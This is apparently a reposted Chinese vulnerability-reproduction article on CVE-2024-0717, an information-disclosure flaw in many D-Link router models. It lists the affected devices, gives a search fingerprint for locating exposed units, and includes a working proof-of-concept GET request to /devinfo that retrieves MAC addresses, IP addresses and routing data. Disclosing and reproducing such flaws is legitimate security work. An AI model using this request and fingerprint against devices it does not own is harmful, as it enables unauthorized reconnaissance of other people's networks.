一:漏洞描述
D-Link 成立于1986年,总部位于台湾,是全球领先的网络设备制造商。他们提供各种网络产品和解决方案,包括路由器、交换机、摄像头、存储设备等,适用于个人用户、企业和运营商。该产品存在信息泄露漏洞。
该漏洞影响了/devinfo文件的HTTP GET请求处理组件中的未知代码。通过操作输入参数notice|net|version的区域,允许攻击者通过指定命令来检索敏感信息,例如设备 MAC 地址、IP 地址、路由详细信息、设备区域、版本号等。
二:漏洞影响版本
DIR
-825
ACG1、DIR
-841
、DIR
-1260
、DIR
-822
、DIR-X1530、DIR
-825
、DIR
-615
、DIR
-842
、DIR
-853
、DIR
-1210
、DIR
-806
A、DIR
-815
、DSL
-245
GR、DSL-G2452GR、DIR
-878
、 DIR
-825
ACF、DIR
-615
T、DIR
-300
、DIR
-842
S、DIR
-815
S、DSL
-2640
U、DIR
-2150
、DWR
-921
、DIR
-615
S、DIR
-620
、DVG
-5402
G、DIR
-882
、DWM
-312
W、DIR
-815
/AC、DSL
-224
、DWM
-321
、DIR-X1860、DAP
-1360
、DIR
-820
、DIR
-843
、DVG
-5402
G/GFRU、DWR
-953
、DVG-N5402G/IL、DIR
-825
AC、DIR
-620
S、DVG-N5402G、Good Line Router v2、DSL
-2750
U、DIR
-615
GF、DIR
-816
三:网络空间测绘查询
"admin/templates/body.tpl.html"
五:漏洞复现
POC:
GET
/devinfo?area=notice|net|version
HTTP/1.1
Host
:
Cache-Control
: max-age=0
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding
: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
六:批量检测
原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-0717
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论